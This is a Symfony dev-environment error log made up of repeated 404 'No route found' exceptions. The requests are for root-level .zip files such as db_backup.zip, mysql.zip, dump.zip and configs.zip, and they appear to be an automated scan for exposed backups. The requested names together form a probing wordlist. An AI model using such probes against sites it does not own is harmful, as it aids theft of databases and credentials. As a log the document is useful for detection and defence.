[2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /rest.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /rest.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /graphql.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /graphql.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /soap.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /soap.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /restapi.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /restapi.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /database.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /database.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /json.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /json.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /db_backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /db_backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /xml.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /xml.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /db.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /db.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dump.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dump.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dbadmin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dbadmin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dbdump.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dbdump.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /postgresql.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /postgresql.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /rpc.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /rpc.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sqllite.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sqllite.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dbase.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dbase.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mysql.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mysql.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sql.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sql.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /cassandra.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /cassandra.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /data.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /data.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /back_up.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /back_up.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /postgres.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /postgres.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_4.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_4.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /base.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /base.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mssql.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mssql.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sqlite.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sqlite.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_daily.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_daily.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /neo4j.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /neo4j.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /conf.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /conf.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /configs.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /configs.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_5.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_5.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /configuration.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /configuration.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /old.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /old.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ini.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ini.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /cfg.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /cfg.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mirror.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mirror.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /control_panel.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /control_panel.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mariadb.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mariadb.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dev.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dev.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /prototype.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /prototype.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /vendor.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /vendor.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /whm.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /whm.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backups.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backups.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /elasticsearch.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /elasticsearch.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
